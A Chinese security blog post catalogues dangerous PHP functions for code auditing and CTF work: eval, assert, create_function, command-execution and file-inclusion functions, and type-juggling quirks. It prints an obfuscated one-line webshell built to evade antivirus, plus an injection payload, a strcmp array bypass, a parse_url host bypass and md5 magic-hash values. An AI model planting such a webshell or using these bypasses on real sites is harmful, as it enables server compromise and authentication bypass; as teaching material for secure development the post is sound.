<!DOCTYPE html><html><head><meta name="generator" content="Hexo 3.8.0"><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="PHP中危险函数"><meta name="keywords" content="PHP,shell"><meta name="author" content="Sys71m"><meta name="copyright" content="Sys71m"><title>PHP中危险函数 | sys71m</title><link rel="shortcut icon" href="/lufei.ico"><link rel="stylesheet" href="/css/index.css?version=1.7.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.7.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  }
} </script><link rel="alternate" href="/atom.xml" title="sys71m" type="application/atom+xml">
</head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="Toggle article">Toggle site</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#代码执行类"><span class="toc-number">1.</span> <span class="toc-text">代码执行类</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#eval"><span class="toc-number">1.1.</span> <span class="toc-text">eval</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#creat-function"><span class="toc-number">1.2.</span> <span class="toc-text">creat_function</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#preg-replace"><span class="toc-number">1.3.</span> <span class="toc-text">preg_replace</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#命令执行类"><span class="toc-number">2.</span> <span class="toc-text">命令执行类</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#exec"><span class="toc-number">2.1.</span> <span class="toc-text">exec</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#passthru"><span class="toc-number">2.2.</span> <span class="toc-text">passthru</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#system"><span class="toc-number">2.3.</span> <span class="toc-text">system</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#shell-exec"><span class="toc-number">2.4.</span> <span class="toc-text">shell_exec</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#proc-open"><span class="toc-number">2.5.</span> <span class="toc-text">proc_open</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#popen"><span class="toc-number">2.6.</span> <span class="toc-text">popen</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#文件操作类"><span class="toc-number">3.</span> <span class="toc-text">文件操作类</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#file-get-contents"><span class="toc-number">3.1.</span> <span class="toc-text">file_get_contents</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#file-put-contents"><span class="toc-number">3.2.</span> <span class="toc-text">file_put_contents</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#fopen"><span class="toc-number">3.3.</span> <span class="toc-text">fopen</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#move-uploaded-file"><span class="toc-number">3.4.</span> <span class="toc-text">move_uploaded_file</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#readfile"><span class="toc-number">3.5.</span> <span class="toc-text">readfile</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#unlink-amp-delete"><span class="toc-number">3.6.</span> <span class="toc-text">unlink &amp; delete</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#rmdir"><span class="toc-number">3.7.</span> <span class="toc-text">rmdir</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#文件包含类"><span class="toc-number">4.</span> <span class="toc-text">文件包含类</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#require-amp-include"><span class="toc-number">4.1.</span> <span class="toc-text">require &amp; include</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#require-once-amp-include-once"><span class="toc-number">4.2.</span> <span class="toc-text">require_once &amp; include_once</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#特殊函数"><span class="toc-number">5.</span> <span class="toc-text">特殊函数</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#is-numeric"><span class="toc-number">5.1.</span> <span class="toc-text">is_numeric</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#glob"><span class="toc-number">5.2.</span> <span class="toc-text">glob</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#strcmp"><span class="toc-number">5.3.</span> <span class="toc-text">strcmp</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#strlen"><span class="toc-number">5.4.</span> <span class="toc-text">strlen</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#parse-url-url-PHP-URL-HOST"><span class="toc-number">5.5.</span> <span class="toc-text">parse_url($url, PHP_URL_HOST)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#弱类型"><span class="toc-number">5.6.</span> <span class="toc-text">弱类型</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#小结"><span class="toc-number">6.</span> <span class="toc-text">小结</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Reference"><span class="toc-number">7.</span> <span class="toc-text">Reference</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="https://raw.githubusercontent.com/ttonys/gitPic/master/lufei.jpg"></div><div class="author-info__name text-center">Sys71m</div><div class="author-info__description text-center"></div><div class="follow-button"><a href="https://github.com/ttonys">Follow Me</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">Articles</span><span class="pull-right">33</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">Tags</span><span class="pull-right">48</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">Categories</span><span class="pull-right">18</span></a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://raw.githubusercontent.com/ttonys/MarkDownPic/master/test33.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">sys71m</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">Home</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/categories">Categories</a></span><span class="pull-right"></span></div><div id="post-info"><div id="post-title">PHP中危险函数</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2017-11-22</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/总结/">总结</a><span class="post-meta__separator">|</span><i class="fa fa-comment-o post-meta__icon" aria-hidden="true"></i><a href="/2017/11/22/PHP中危险函数/#disqus_thread"><span class="disqus-comment-count" data-disqus-identifier="2017/11/22/PHP中危险函数/"></span></a><div class="post-meta-wordcount"><span>Word count: </span><span class="word-count">1.9k</span><span class="post-meta__separator">|</span><span>Reading time: 6 min</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><p>无论在CTF还是实际渗透过程中，代码审计都是重要的一环，如果开发者没有对数据进行过滤或者在不恰当的位置使用了某些函数，往往会造成意想不到的漏洞。下面总结一下易造成危害的函数，提高我们在实际开发或者代码审计方面的敏感性，做到更加安全的开发。</p>
<a id="more"></a>  
<h2 id="代码执行类"><a href="#代码执行类" class="headerlink" title="代码执行类"></a>代码执行类</h2><h3 id="eval"><a href="#eval" class="headerlink" title="eval"></a>eval</h3><p>这个函数大家应该很熟悉，函数的意思是将字符串的内容当做为PHP代码执行，比如我们常用到的一句话木马<code></code>,在杀毒软件中，大多数已经把eval列入黑名单了,因此需要更加隐蔽的后门，如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">error_reporting(0);</span><br><span class="line">$g = array(&apos;&apos;,&apos;s&apos;);</span><br><span class="line">$gg = a.$g[1].ser.chr(&apos;116&apos;);</span><br><span class="line">@$gg($_POST[get]);</span><br><span class="line">?&gt;</span><br><span class="line">这里分析一下webshell代码：</span><br><span class="line">php中“.”表示将前后单位以字符串形式拼接</span><br><span class="line">数组g[1]=s, char(116)是t ，gg连起来就是assert</span><br><span class="line">整个一句话为@$assert($_POST(get))</span><br></pre></td></tr></table></figure>
<h3 id="creat-function"><a href="#creat-function" class="headerlink" title="creat_function"></a>creat_function</h3><p>这个函数会创建一个匿名的函数，并返回独一无二的函数名。第一个参数是参数，第二个参数是内容。结构类似于：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">create_function(&apos;$a,$b&apos;,&apos;return 111&apos;)</span><br><span class="line">==&gt;</span><br><span class="line">function a($a, $b)&#123;</span><br><span class="line">    return 111;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>如果传入的如下内容，便可造成代码执行：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">create_function(&apos;$a,$b&apos;,&apos;return 111;&#125;phpinfo();//&apos;)</span><br><span class="line">==&gt;</span><br><span class="line">function a($a, $b)&#123;</span><br><span class="line">    return 111;&#125;phpinfo();//</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>php7.2以后弃用了<code>create_function</code>函数，继续使用将会发出警告。</p>
<h3 id="preg-replace"><a href="#preg-replace" class="headerlink" title="preg_replace"></a>preg_replace</h3><p>这个函数的作用是执行正则表达式，这个函数的原型为<code>mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit])</code>，如果在构造正则表达式的时候，使用了<code>/e</code>修正符，这时，<code>preg_replace</code>会将<code>replacement</code>参数当做php代码执行。</p>
<p>如下所示：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">preg_replace(&quot;/test/e&quot;,&quot;phpinfo();&quot;,&quot;jutst test&quot;)</span><br></pre></td></tr></table></figure>
<p>php5.5后<code>/e</code>修饰符已被弃用，php7以后不在支持<code>/e</code>修饰符。</p>
<p>assert</p>
<p>断言，这是一个调试函数，它会检测一个断言是否为False。它与eval的用法类似，可以将字符串当成PHP代码来执行，但是断言这个功能应该只被用来调试。</p>
<p>php7以后<code>assert</code>默认不再可以执行代码，菜刀在实现文件管理器的时候用的恰好也是assert函数，这也导致菜刀没办法在PHP7上正常运行。</p>
<h2 id="命令执行类"><a href="#命令执行类" class="headerlink" title="命令执行类"></a>命令执行类</h2><p>以下函数在参数可控的情况下，往往可以通过截断，管道等方法执行任意命令，需要注意的一点是php7以后<code>exec</code>, <code>system</code>和<code>passthru</code>将会有空字节保护 。</p>
<h3 id="exec"><a href="#exec" class="headerlink" title="exec"></a>exec</h3><p>exec执行command命令，但是不会输出全部结果，而是返回结果的最后一行，如果想得到全部的结果，可以使用第二个参数，让其输出到一个数组。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">string exec ( string $command [, array &amp;$output [, int &amp;$return_var ]] )</span><br></pre></td></tr></table></figure>
<h3 id="passthru"><a href="#passthru" class="headerlink" title="passthru"></a>passthru</h3><p>类似于exec，但passthru直接将结果输出，不返回结果，不用使用echo查看结果。</p>
<h3 id="system"><a href="#system" class="headerlink" title="system"></a>system</h3><p>与passthru的基本相同，但是system返回结果并且输出。</p>
<h3 id="shell-exec"><a href="#shell-exec" class="headerlink" title="shell_exec"></a>shell_exec</h3><p>通过shell环境执行命令，并且将完整的输出以字符串方式返回。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">类似于：&lt;?php echo `pwd` ?&gt;</span><br></pre></td></tr></table></figure>
<h3 id="proc-open"><a href="#proc-open" class="headerlink" title="proc_open"></a>proc_open</h3><p>执行一个命令，并且打开用来输入的文件指针</p>
<h3 id="popen"><a href="#popen" class="headerlink" title="popen"></a>popen</h3><p>使用 command 参数打开进程文件指针，如果出错，该函数返回 FALSE。</p>
<h2 id="文件操作类"><a href="#文件操作类" class="headerlink" title="文件操作类"></a>文件操作类</h2><p>在需要传filename的地方，基本可以使用流协议，往往可以绕过特殊字符的过滤写入文件或读取文件，造成文件泄露，下面将会展示此类用法。</p>
<h3 id="file-get-contents"><a href="#file-get-contents" class="headerlink" title="file_get_contents"></a>file_get_contents</h3><p>把整个文件读入一个字符串中，类似于file函数，不过file函数是将文件读入一个数组中，变量名可控下往往会造成任意文件读取。</p>
<h3 id="file-put-contents"><a href="#file-put-contents" class="headerlink" title="file_put_contents"></a>file_put_contents</h3><p>将一个字符串写入文件，文件名可控下可以通过php伪协议来传入字符，如下：</p>
<p><img src="https://pic.superbed.cn/item/5c823c7a3a213b04177e8223?ynotemdtimestamp=1581690186701" alt="image"></p>
<h3 id="fopen"><a href="#fopen" class="headerlink" title="fopen"></a>fopen</h3><p>打开文件或者 URL。如果打开失败，返回false。</p>
<h3 id="move-uploaded-file"><a href="#move-uploaded-file" class="headerlink" title="move_uploaded_file"></a>move_uploaded_file</h3><p>将上传的文件移动到新位置</p>
<h3 id="readfile"><a href="#readfile" class="headerlink" title="readfile"></a>readfile</h3><p>输出一个文件，该函数读入一个文件并写入到输出缓冲，若成功，则返回从文件中读入的字节数。若失败，则返回false。</p>
<h3 id="unlink-amp-delete"><a href="#unlink-amp-delete" class="headerlink" title="unlink &amp; delete"></a>unlink &amp; delete</h3><p>删除文件</p>
<h3 id="rmdir"><a href="#rmdir" class="headerlink" title="rmdir"></a>rmdir</h3><p>删除目录</p>
<h2 id="文件包含类"><a href="#文件包含类" class="headerlink" title="文件包含类"></a>文件包含类</h2><p>包含函数一共有四个，他们分别为：<code>require</code>、<code>include</code>、<code>require_once</code>、<code>include_once</code>，主要作用为包含并运行指定文件中的代码。</p>
<p>在不同的配置环境下，可以包含不同的文件，因此又分为远程文件包含和本地文件包含，建议将远程包含开关<code>allow_url_include</code>设置为off，如果开始是打开，它可以包含网上任意文件，这样一来网站十分危险。</p>
<h3 id="require-amp-include"><a href="#require-amp-include" class="headerlink" title="require &amp; include"></a>require &amp; include</h3><ul>
<li>include 和 require语句用于在执行流中插入写在其他文件中的有用的代码。</li>
<li>include 和 require除了处理错误的方式不同之外，在其他方面都是相同的：</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">require 生成一个致命错误（E_COMPILE_ERROR），在错误发生后脚本会停止执行。</span><br><span class="line">include 生成一个警告（E_WARNING），在错误发生后脚本会继续执行。</span><br></pre></td></tr></table></figure>
<h3 id="require-once-amp-include-once"><a href="#require-once-amp-include-once" class="headerlink" title="require_once &amp; include_once"></a>require_once &amp; include_once</h3><ul>
<li>include_once （require_once）语句在脚本执行期间包含并运行指定文件。此行为和 include （require）语句类似，区别是如果该文件中的代码已经被包含了，则不会再次包含，只会包含一次。include_once（require_once）需要查询一遍已加载的文件列表, 确认是否存在, 然后再加载。</li>
</ul>
<h2 id="特殊函数"><a href="#特殊函数" class="headerlink" title="特殊函数"></a>特殊函数</h2><h3 id="is-numeric"><a href="#is-numeric" class="headerlink" title="is_numeric"></a>is_numeric</h3><p>判读是否为数字，如果提交的参数是数字或者数字字符串就正常，也就是TRUE，否则返回FALSE。仅用is_numeric判断而不用intval函数转换，就有可能插入16进制的字符串到数据库，进而可能导致sql二次注入。</p>
<p>php7以后十六进制字符串不再被认为是数字。</p>
<h3 id="glob"><a href="#glob" class="headerlink" title="glob"></a>glob</h3><p>可以筛选出当前目录下的文件，可以进行条件控制。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php print_r(glob(&quot;*.php)); ?&gt;</span><br></pre></td></tr></table></figure>
<h3 id="strcmp"><a href="#strcmp" class="headerlink" title="strcmp"></a>strcmp</h3><p>字符串对比，可以使用数组绕过，类似的含有<code>sha</code>函数, <code>sha</code>函数无法处理数组，同时返回flase，判断相同。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$password=$_GET[&apos;password&apos;];</span><br><span class="line">if(strcmp(&apos;am0s&apos;,$password))&#123;</span><br><span class="line">    echo &apos;false!&apos;;</span><br><span class="line">&#125;else&#123;</span><br><span class="line">    echo &apos;success!&apos;;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br><span class="line">输入password[]=1则返回success，成功绕过验证</span><br></pre></td></tr></table></figure>
<h3 id="strlen"><a href="#strlen" class="headerlink" title="strlen"></a>strlen</h3><p>返回字符串的长度</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">如果strlen()限制了长度小于8并且大小必须大于9999999,可以构造1e8=100000000 &gt; 9999999</span><br></pre></td></tr></table></figure>
<h3 id="parse-url-url-PHP-URL-HOST"><a href="#parse-url-url-PHP-URL-HOST" class="headerlink" title="parse_url($url, PHP_URL_HOST)"></a>parse_url($url, PHP_URL_HOST)</h3><ul>
<li>如果代码规定<code>parse_url($url, PHP_URL_HOST) !== &quot;www.baidu.com&quot;</code>, 可以利用http的解析规则绕过host的限制：<code>http://@127.0.0.1:80@www.baidu.com/admin.php</code></li>
</ul>
<h3 id="弱类型"><a href="#弱类型" class="headerlink" title="弱类型"></a>弱类型</h3><ul>
<li>在php中，使用两个等号来判断时，只需要两个变量的值相同即可返回true，否则返回false。而使用三个等号，则需要两个变量不仅要值相同，并且两个变量的类型也必须相同时才会返回true，否则返回false。</li>
<li>构造<code>md5(&#39;QNKCDZO&#39;) == md5(&#39;s878926199a&#39;)</code>便可绕过md5的检测，因此敏感的地方建议使用<code>===</code>或者<code>!==</code>.</li>
</ul>
<h2 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h2><p>余弦大佬曾经说过，web安全重点就三个词——“输入”，“输出”，“数据流”。前面提到的函数都有着自己特定的功能，是开发过程中需要用到的。所谓有输入便有风险，攻击者往往不会按照开发者想要的情况来进行操作，因此在防护安全方面，永远不要相信用户输入的内容。</p>
<h2 id="Reference"><a href="#Reference" class="headerlink" title="Reference"></a>Reference</h2><ul>
<li><a href="https://fly8wo.github.io/2018/08/13/PHP代码审计——常见危险及特殊函数/" target="_blank" rel="noopener">https://fly8wo.github.io/2018/08/13/PHP代码审计——常见危险及特殊函数/</a></li>
<li><a href="https://www.freebuf.com/articles/web/197013.html" target="_blank" rel="noopener">https://www.freebuf.com/articles/web/197013.html</a></li>
</ul>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">Sys71m</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="https://www.sys71m.top/2017/11/22/PHP中危险函数/">https://www.sys71m.top/2017/11/22/PHP中危险函数/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/PHP/">PHP</a><a class="post-meta__tags" href="/tags/shell/">shell</a></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2018/03/20/Git使用小结/"><i class="fa fa-chevron-left">  </i><span>Git使用小结</span></a></div></nav><div id="disqus_thread"></div><script>var unused = null;
var disqus_config = function () {
  this.page.url = 'https://www.sys71m.top/2017/11/22/PHP中危险函数/';
  this.page.identifier = '2017/11/22/PHP中危险函数/';
  this.page.title = 'PHP中危险函数';
}
var d = document, s = d.createElement('script');
s.src = "https://" + 'sys71m' +".disqus.com/embed.js";
s.setAttribute('data-timestamp', '' + +new Date());
(d.head || d.body).appendChild(s);</script><script id="dsq-count-scr" src="https://sys71m.disqus.com/count.js" async></script></div></div><footer class="footer-bg" style="background-image: url(https://raw.githubusercontent.com/ttonys/MarkDownPic/master/test33.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2017 - 2020 By Sys71m</div><div class="framework-info"><span>Driven - </span><a href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>Theme - </span><a href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.7.0"></script><script src="/js/fancybox.js?version=1.7.0"></script><script src="/js/sidebar.js?version=1.7.0"></script><script src="/js/copy.js?version=1.7.0"></script><script src="/js/fireworks.js?version=1.7.0"></script><script src="/js/transition.js?version=1.7.0"></script><script src="/js/scroll.js?version=1.7.0"></script><script src="/js/head.js?version=1.7.0"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script></body></html>